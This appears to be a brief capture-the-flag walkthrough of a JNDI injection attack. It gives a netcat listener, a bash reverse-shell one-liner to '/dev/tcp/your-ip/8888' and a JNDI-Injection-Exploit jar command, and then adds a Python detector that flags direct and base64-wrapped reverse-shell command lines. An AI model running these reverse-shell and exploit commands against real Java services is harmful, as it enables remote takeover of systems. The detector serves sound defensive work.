1. Start a listener on the VPS
nc -lvvp 4444
# While you are at it, write the payload
bash -i >& /dev/tcp/your-ip/8888 0>&1
2. Convert the payload
java.lang.Runtime.exec() Payload Workarounds - @Jackson_T
Prepare the actual payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "the payload above" -A "your-ip"
Start the JNDI listener
Get the flag
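
From the defender's side, the payload in step 1 and its converted form from step 2 both leave a recognisable process command line. The following is an added example, not part of the original write-up: it flags both forms in process-audit lines, assuming the conversion yields the common {echo,<base64>}|{base64,-d}|{bash,-i} wrapper. The sample lines, the 192.0.2.10 address and the function names are constructed for illustration.

```python
import base64
import re

# Direct form: shell I/O redirected to /dev/tcp/<host>/<port>
DEV_TCP = re.compile(r"/dev/tcp/([^/\s]+)/(\d{1,5})")
# Wrapped form (assumed output of the Runtime.exec() conversion step)
WRAPPED = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}\|\{base64,-d\}\|\{(?:ba)?sh,-i\}")


def find_reverse_shell(cmdline):
    """Return (form, host, port) if cmdline carries a /dev/tcp reverse shell, else None."""
    m = DEV_TCP.search(cmdline)
    if m:
        return ("direct", m.group(1), int(m.group(2)))
    w = WRAPPED.search(cmdline)
    if w:
        try:
            decoded = base64.b64decode(w.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            return None  # not valid base64, nothing to inspect
        m = DEV_TCP.search(decoded)
        if m:
            return ("base64-wrapped", m.group(1), int(m.group(2)))
    return None


def scan(lines):
    """Return (line_number, form, host, port) for every suspicious command line."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = find_reverse_shell(line)
        if hit:
            hits.append((n,) + hit)
    return hits


# Constructed sample command lines (192.0.2.10 is a documentation address)
_INNER = "bash -i >& /dev/tcp/192.0.2.10/8888 0>&1"
_B64 = base64.b64encode(_INNER.encode()).decode()
SAMPLE = [
    "java -jar app.jar --server.port=8080",             # benign
    "bash -c " + _INNER,                                # direct form
    "bash -c {echo," + _B64 + "}|{base64,-d}|{bash,-i}",  # wrapped form
    "bash -c {echo,aGVsbG8=}|{base64,-d}|{bash,-i}",    # wrapper, harmless content
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A Java server process that spawns bash with either form is worth alerting on regardless of the decoded destination.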